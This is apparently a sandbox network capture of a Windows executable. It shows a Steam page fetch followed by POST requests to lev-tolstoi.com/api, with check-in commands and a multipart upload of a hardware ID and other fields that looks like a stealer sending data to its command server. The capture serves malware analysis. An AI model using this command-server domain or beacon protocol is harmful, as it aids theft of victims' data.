                                                                                                                                                                                                                                                                        2024-12-28 08:58:58 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                        2024-12-28 08:58:58 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.649710104.21.66.864433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:59:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=th1r09gsf52i99cu59kr1nvtbq; expires=Wed, 23 Apr 2025 02:45:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JUGHjB7Roc6raq%2BJT9jFvfDEDDMSui%2BUmVE6hPDLMESQ2KLQiCotrU30XRLHw%2FIXERZiSUbBx6E8SEryNWCgeHesktXgp7IIsGFckpvKzsDZx7gzUMTh2vThwHrFLMgDPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f905a0f48810f46-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1476&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1918528&cwnd=226&unsent_bytes=0&cid=348f2807292a933d&ts=737&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                        2024-12-28 08:59:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        2192.168.2.649716104.21.66.864433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:59:02 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 74
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-28 08:59:02 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:59:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=folt37pugqsqi6mt72hod9b7h2; expires=Wed, 23 Apr 2025 02:45:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y8TqXKXC%2B8FZUSY7RPF7o8Vy69sTWHT5LM%2FX8FMFBqDOEMwq9yW4%2BZQ2q4ewLmCjw0YJK6X%2F5%2FUf%2BoS%2BzT0gIChF8zsrnJhYF%2FhubfWLi3i67ZvppUsPu3BywGnm4FNKp7s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f905a1cfeaf4299-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1569&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=973&delivery_rate=1780487&cwnd=251&unsent_bytes=0&cid=37ff4a1b876cdfd0&ts=783&x=0"
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC236INData Raw: 63 34 64 0d 0a 65 68 68 67 50 79 42 46 76 59 6b 52 48 63 47 73 5a 6d 34 4e 70 70 57 45 58 62 34 46 79 6c 69 4d 51 5a 47 4f 47 7a 62 4c 78 74 63 42 4f 68 59 64 47 6e 47 52 71 32 4a 34 34 35 59 53 48 48 6a 44 75 61 59 38 32 69 66 77 50 75 30 74 34 75 73 33 46 4c 32 72 39 55 42 2b 41 56 4e 54 49 4a 47 72 64 47 58 6a 6c 6a 30 56 4c 38 50 37 70 6d 65 63 59 4b 41 36 37 53 33 7a 37 33 42 5a 75 36 71 30 45 6e 51 48 56 30 55 6d 32 65 68 39 63 4b 54 4a 41 77 39 6e 79 50 7a 70 4e 64 4d 6e 35 6e 72 70 4f 37 4f 30 4f 58 75 75 73 72 59 33 65 52 4e 55 41 6a 69 52 38 6a 4e 34 72 34 35 63 54 47 7a 44 39 2b 67 37 32 6d 36 69 4d 4f 51 6c 38 75 70 78 52 71 4b 67 76 78 4a 36 42 46 5a 50 4c 38 33 6c 64 33 65 76 7a 77 6b
                                                                                                                                                                                                                                                                        Data Ascii: c4dehhgPyBFvYkRHcGsZm4NppWEXb4FyliMQZGOGzbLxtcBOhYdGnGRq2J445YSHHjDuaY82ifwPu0t4us3FL2r9UB+AVNTIJGrdGXjlj0VL8P7pmecYKA67S3z73BZu6q0EnQHV0Um2eh9cKTJAw9nyPzpNdMn5nrpO7O0OXuusrY3eRNUAjiR8jN4r45cTGzD9+g72m6iMOQl8upxRqKgvxJ6BFZPL83ld3evzwk
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 50 4c 34 71 33 34 53 65 63 50 2b 68 70 33 43 44 69 2f 57 78 5a 75 61 4c 31 42 7a 51 62 48 55 55 72 6e 37 4d 7a 64 36 2f 41 41 51 39 67 77 2f 62 6d 4c 64 4e 6e 71 7a 4c 6d 4a 2f 6e 6a 64 6c 75 6e 72 72 49 51 63 77 56 53 52 53 2f 5a 35 48 41 2f 37 59 34 44 46 43 2b 63 74 38 59 76 33 32 53 38 4e 2f 39 6a 37 4b 4a 67 46 4b 36 6f 39 55 41 36 42 46 4e 44 4b 74 2f 35 65 33 53 6f 79 78 59 48 5a 73 6e 36 35 6a 4c 57 61 4b 73 36 36 53 6e 35 34 33 4e 51 70 4b 6d 7a 47 48 70 43 45 77 49 67 78 36 73 72 50 34 44 4c 46 41 74 6a 30 72 58 63 66 38 4d 70 73 58 72 70 4c 37 4f 30 4f 56 79 73 70 37 59 54 64 51 46 56 53 54 58 66 2b 58 56 79 70 74 77 43 43 57 48 4f 39 50 51 31 30 6d 47 72 4d 2b 55 71 39 75 74 39 46 4f 66 6b 73 67 41 36 57 68 31 6a 4b 74 54 6e 65 57 69 6a 6a 68
                                                                                                                                                                                                                                                                        Data Ascii: PL4q34SecP+hp3CDi/WxZuaL1BzQbHUUrn7Mzd6/AAQ9gw/bmLdNnqzLmJ/njdlunrrIQcwVSRS/Z5HA/7Y4DFC+ct8Yv32S8N/9j7KJgFK6o9UA6BFNDKt/5e3SoyxYHZsn65jLWaKs66Sn543NQpKmzGHpCEwIgx6srP4DLFAtj0rXcf8MpsXrpL7O0OVysp7YTdQFVSTXf+XVyptwCCWHO9PQ10mGrM+Uq9ut9FOfksgA6Wh1jKtTneWijjh
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 2b 2f 51 7a 31 6d 47 6e 4e 2b 4a 6a 76 61 78 2b 54 4f 6e 38 39 54 4a 35 46 6c 35 49 5a 65 72 6f 66 58 47 6b 32 45 51 54 49 64 32 33 34 54 4f 63 50 2b 67 33 37 79 76 31 2f 6e 5a 5a 71 71 71 37 46 33 38 4e 56 55 49 6e 30 75 35 33 64 4b 6a 4e 43 51 68 39 7a 76 66 75 4f 74 31 74 6f 6e 71 67 59 2f 54 30 4f 51 7a 70 6c 61 49 54 4f 44 64 65 54 43 6e 59 2f 54 4e 67 37 64 64 45 43 32 4f 45 72 36 59 79 31 47 4b 74 4e 65 38 70 2f 65 6c 7a 57 4b 47 71 74 67 70 31 42 6c 31 4f 4c 39 58 6d 66 58 75 72 78 77 38 48 61 63 54 32 37 48 2b 53 4a 36 38 69 72 6e 75 7a 32 48 35 59 70 4b 76 33 4c 58 6b 4d 55 30 55 78 6e 2f 51 39 5a 75 50 4a 43 45 77 33 68 50 76 76 50 39 64 74 72 44 72 70 4c 76 62 76 66 6c 65 6b 6f 37 38 57 66 51 5a 52 53 79 72 5a 36 33 52 37 70 74 77 42 42 57 50
                                                                                                                                                                                                                                                                        Data Ascii: +/Qz1mGnN+Jjvax+TOn89TJ5Fl5IZerofXGk2EQTId234TOcP+g37yv1/nZZqqq7F38NVUIn0u53dKjNCQh9zvfuOt1tonqgY/T0OQzplaITODdeTCnY/TNg7ddEC2OEr6Yy1GKtNe8p/elzWKGqtgp1Bl1OL9XmfXurxw8HacT27H+SJ68irnuz2H5YpKv3LXkMU0Uxn/Q9ZuPJCEw3hPvvP9dtrDrpLvbvfleko78WfQZRSyrZ63R7ptwBBWP
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC182INData Raw: 63 6f 6e 74 33 54 33 59 2f 54 67 4f 51 7a 70 72 62 77 4b 64 41 78 55 54 79 48 58 37 48 31 79 71 4d 67 50 43 32 6a 43 2b 75 34 79 32 57 53 70 50 75 51 78 38 4f 64 7a 57 61 50 6b 2b 31 68 39 47 68 30 61 5a 2f 6a 6e 57 6d 2b 34 33 42 4a 4d 63 49 72 75 70 6a 6a 51 4a 2f 42 36 37 53 7a 36 34 33 46 63 70 71 75 78 46 6e 77 45 55 45 63 6f 31 66 6c 37 63 61 37 46 43 77 64 39 78 50 72 69 4d 39 68 76 6f 7a 43 75 62 62 50 72 59 52 54 78 35 49 41 56 64 51 4a 65 56 47 66 41 70 57 6f 2f 70 4d 4a 45 56 43 2f 49 2b 65 59 77 30 47 75 6a 4d 75 38 76 2f 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: cont3T3Y/TgOQzprbwKdAxUTyHX7H1yqMgPC2jC+u4y2WSpPuQx8OdzWaPk+1h9Gh0aZ/jnWm+43BJMcIrupjjQJ/B67Sz643FcpquxFnwEUEco1fl7ca7FCwd9xPriM9hvozCubbPrYRTx5IAVdQJeVGfApWo/pMJEVC/I+eYw0GujMu8v/
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 34 31 38 37 0d 0a 65 74 38 58 61 47 73 70 78 6c 2b 43 6c 78 4d 4b 4e 37 76 64 6e 71 6e 79 51 41 4b 59 49 53 35 70 6a 6a 45 4a 2f 42 36 77 51 54 47 72 6c 68 75 36 62 76 37 41 54 6f 46 55 51 4a 2f 6e 2b 64 77 63 36 76 42 41 67 56 6a 7a 76 37 74 4d 39 64 6a 70 44 50 72 4a 66 4c 70 66 46 57 74 71 4c 38 65 65 51 46 53 54 53 6a 58 71 7a 30 2f 70 4e 5a 45 56 43 2f 68 34 4f 30 78 32 69 65 33 64 50 64 6a 39 4f 41 35 44 4f 6d 6f 76 42 35 38 42 31 46 44 49 64 66 75 65 33 75 69 79 41 49 50 59 4d 44 79 35 7a 44 59 61 36 59 77 37 79 4c 2f 35 33 5a 66 72 4f 54 37 57 48 30 61 48 52 70 6e 37 75 68 6c 61 4c 50 43 52 42 4d 68 33 62 66 68 4d 35 77 2f 36 44 76 38 4b 66 6e 69 66 46 75 73 70 37 6f 66 64 77 52 52 53 43 37 58 37 58 78 32 73 63 30 49 41 6d 6a 4b 2b 2b 67 79 31 6d
                                                                                                                                                                                                                                                                        Data Ascii: 4187et8XaGspxl+ClxMKN7vdnqnyQAKYIS5pjjEJ/B6wQTGrlhu6bv7AToFUQJ/n+dwc6vBAgVjzv7tM9djpDPrJfLpfFWtqL8eeQFSTSjXqz0/pNZEVC/h4O0x2ie3dPdj9OA5DOmovB58B1FDIdfue3uiyAIPYMDy5zDYa6Yw7yL/53ZfrOT7WH0aHRpn7uhlaLPCRBMh3bfhM5w/6Dv8KfnifFusp7ofdwRRSC7X7Xx2sc0IAmjK++gy1m
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 4b 4f 48 6d 66 6c 4f 69 72 4c 34 58 66 42 42 52 54 44 58 61 2b 57 45 2f 37 59 34 44 46 43 2b 63 74 39 41 34 7a 48 65 72 65 4e 38 31 38 50 70 79 57 61 58 6b 71 6c 5a 6a 51 6c 70 4f 5a 34 65 72 64 58 43 71 7a 51 73 4e 5a 73 6a 36 34 7a 62 5a 5a 71 34 2b 35 43 6e 7a 36 6e 39 56 72 4b 36 32 47 58 41 4c 57 6b 6f 67 33 50 6b 7a 4d 65 50 4a 48 45 77 33 68 4e 37 68 4c 64 4a 33 36 43 57 67 4f 72 50 72 64 52 54 78 35 4c 45 53 64 51 5a 61 54 69 48 61 37 58 35 2b 72 4d 38 45 41 32 76 50 2f 75 41 2b 30 57 4b 6c 50 76 77 70 2b 4f 4e 31 58 61 57 70 39 56 59 36 42 55 55 43 66 35 2f 61 66 6e 47 74 79 52 4a 4d 63 49 72 75 70 6a 6a 51 4a 2f 42 36 37 79 2f 38 37 33 5a 58 71 71 57 2f 43 6d 67 4f 56 45 6f 69 30 2b 42 39 65 62 48 49 43 77 56 73 78 2f 37 68 4e 39 42 74 71 7a 32
                                                                                                                                                                                                                                                                        Data Ascii: KOHmflOirL4XfBBRTDXa+WE/7Y4DFC+ct9A4zHereN818PpyWaXkqlZjQlpOZ4erdXCqzQsNZsj64zbZZq4+5Cnz6n9VrK62GXALWkog3PkzMePJHEw3hN7hLdJ36CWgOrPrdRTx5LESdQZaTiHa7X5+rM8EA2vP/uA+0WKlPvwp+ON1XaWp9VY6BUUCf5/afnGtyRJMcIrupjjQJ/B67y/873ZXqqW/CmgOVEoi0+B9ebHICwVsx/7hN9Btqz2
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 47 39 45 76 71 4f 71 56 6d 4e 43 57 6b 35 6e 68 36 74 31 64 71 58 4a 41 67 4a 39 77 66 48 70 4d 4e 56 75 72 44 4c 74 49 2f 66 6f 66 6c 47 71 71 4c 34 66 65 51 31 5a 53 79 6e 57 35 44 4d 78 34 38 6b 63 54 44 65 45 31 76 30 38 30 47 72 6f 4a 61 41 36 73 2b 74 31 46 50 48 6b 75 52 5a 2f 41 6c 64 45 49 39 72 74 65 58 71 6a 78 51 63 44 61 38 4c 7a 36 54 2f 58 62 71 6b 38 36 79 6e 34 36 6e 52 58 72 36 4c 31 56 6a 6f 46 52 51 4a 2f 6e 38 74 6f 63 71 2f 4a 52 42 4d 68 33 62 66 68 4d 35 77 2f 36 44 48 69 4a 2f 54 73 64 46 65 68 6f 62 45 53 66 77 4a 56 55 43 2f 66 37 47 46 74 6f 38 63 42 41 47 7a 45 38 2b 41 32 32 6d 53 73 65 71 42 6a 39 50 51 35 44 4f 6d 4a 75 52 39 54 42 55 59 43 4f 4a 48 79 4d 33 69 76 6a 6c 78 4d 62 73 2f 39 36 54 4c 66 59 61 73 78 36 79 6e 79
                                                                                                                                                                                                                                                                        Data Ascii: G9EvqOqVmNCWk5nh6t1dqXJAgJ9wfHpMNVurDLtI/foflGqqL4feQ1ZSynW5DMx48kcTDeE1v080GroJaA6s+t1FPHkuRZ/AldEI9rteXqjxQcDa8Lz6T/Xbqk86yn46nRXr6L1VjoFRQJ/n8tocq/JRBMh3bfhM5w/6DHiJ/TsdFehobESfwJVUC/f7GFto8cBAGzE8+A22mSseqBj9PQ5DOmJuR9TBUYCOJHyM3ivjlxMbs/96TLfYasx6yny
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 6d 32 39 55 41 36 52 56 35 51 4e 64 6e 6f 5a 58 7a 6b 38 44 6f 72 64 63 6e 78 38 53 37 69 57 61 38 67 34 79 58 6b 2f 54 56 42 71 71 71 37 48 32 78 43 45 77 49 6f 6e 37 4e 4b 50 2b 75 4f 4f 30 49 76 33 4c 65 2b 66 2b 6c 6b 70 6a 54 70 4e 65 4b 68 58 6b 36 6b 6f 71 49 4a 4f 6b 77 64 52 47 65 48 75 7a 30 2f 70 39 39 45 56 44 2b 57 72 4c 4e 73 69 7a 66 36 4a 61 41 36 73 2f 6f 35 44 50 76 71 39 51 6f 36 57 68 30 46 4a 4d 33 35 64 58 79 31 7a 55 4d 79 55 65 72 77 34 44 72 62 64 2b 6f 55 35 54 66 30 72 44 63 55 70 75 54 74 49 54 70 4b 48 58 31 70 6e 2f 4d 7a 4a 2b 50 37 42 77 4a 68 77 2b 48 33 63 76 4a 67 72 6a 2f 70 4d 37 48 43 63 6b 43 75 35 50 74 59 66 45 49 46 45 6d 6d 66 37 32 49 2f 2b 35 35 57 56 7a 71 58 6f 4c 5a 74 77 79 6d 78 65 76 68 6a 71 37 34 33 46
                                                                                                                                                                                                                                                                        Data Ascii: m29UA6RV5QNdnoZXzk8Dordcnx8S7iWa8g4yXk/TVBqqq7H2xCEwIon7NKP+uOO0Iv3Le+f+lkpjTpNeKhXk6koqIJOkwdRGeHuz0/p99EVD+WrLNsizf6JaA6s/o5DPvq9Qo6Wh0FJM35dXy1zUMyUerw4Drbd+oU5Tf0rDcUpuTtITpKHX1pn/MzJ+P7BwJhw+H3cvJgrj/pM7HCckCu5PtYfEIFEmmf72I/+55WVzqXoLZtwymxevhjq743F
                                                                                                                                                                                                                                                                        2024-12-28 08:59:03 UTC1369INData Raw: 57 64 41 56 4c 55 32 65 52 71 33 77 2f 2b 2f 64 45 52 43 2f 37 75 61 59 6e 6e 44 2f 6f 44 2b 30 74 2f 65 74 76 52 65 53 44 75 78 39 37 46 45 31 56 4b 4a 44 46 52 56 37 6a 67 45 51 4b 4c 35 79 6c 71 48 2f 59 64 75 68 69 76 6e 47 6f 75 53 6f 44 2b 66 61 71 56 6d 4e 43 53 77 4a 2f 6a 61 55 7a 62 65 4f 57 52 45 74 73 31 75 58 67 50 4d 70 6b 37 77 54 51 42 50 33 72 65 45 4b 35 71 62 6b 35 65 52 4e 58 66 42 6e 4b 36 48 31 78 70 4e 67 56 54 43 47 45 2b 4b 5a 6e 35 53 66 67 65 74 46 74 73 2f 51 35 44 4f 6d 52 74 68 5a 30 42 55 74 54 61 76 6a 6c 64 48 36 31 33 67 6b 41 54 73 66 6d 37 48 2b 53 4a 36 35 36 74 6e 47 39 72 48 31 46 36 66 7a 6c 53 69 46 58 44 68 56 33 6a 66 51 39 5a 75 50 59 52 46 51 39 69 72 66 30 66 34 51 6e 37 7a 6e 38 4d 66 58 76 62 31 66 75 6d 6f
                                                                                                                                                                                                                                                                        Data Ascii: WdAVLU2eRq3w/+/dERC/7uaYnnD/oD+0t/etvReSDux97FE1VKJDFRV7jgEQKL5ylqH/YduhivnGouSoD+faqVmNCSwJ/jaUzbeOWREts1uXgPMpk7wTQBP3reEK5qbk5eRNXfBnK6H1xpNgVTCGE+KZn5SfgetFts/Q5DOmRthZ0BUtTavjldH613gkATsfm7H+SJ656tnG9rH1F6fzlSiFXDhV3jfQ9ZuPYRFQ9irf0f4Qn7zn8MfXvb1fumo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.649722104.21.66.864433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:59:04 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=OVN8F7K2V
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 12800
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-28 08:59:04 UTC12800OUTData Raw: 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 31 37 37 42 36 36 31 35 46 42 39 30 46 43 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4f 56 4e 38 46 37 4b 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                                        Data Ascii: --OVN8F7K2VContent-Disposition: form-data; name="hwid"F1177B6615FB90FCF9F1B7136A1E0C5E--OVN8F7K2VContent-Disposition: form-data; name="pid"2--OVN8F7K2VContent-Disposition: form-data; name="lid"4h5VfH----OVN8F7K2VContent-Dispositi
                                                                                                                                                                                                                                                                        2024-12-28 08:59:05 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=vikdjs9b887qetu7l867lhd0t5; expires=Wed, 23 Apr 2025 02:45:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lVxQLIIqu3KX7Cy5l9%2FbQLeGFBMAfenRqr8iurRgBiXozzH%2BwZJKjCb8h4JjPNEyoeY0%2FJ7BIdPYg1lgbyK0brv7zlKkjU9EtGqwJuEn7F7QHhJO38y5TbjIOiIeWmwi7Rc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f905a2b6dad43c1-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
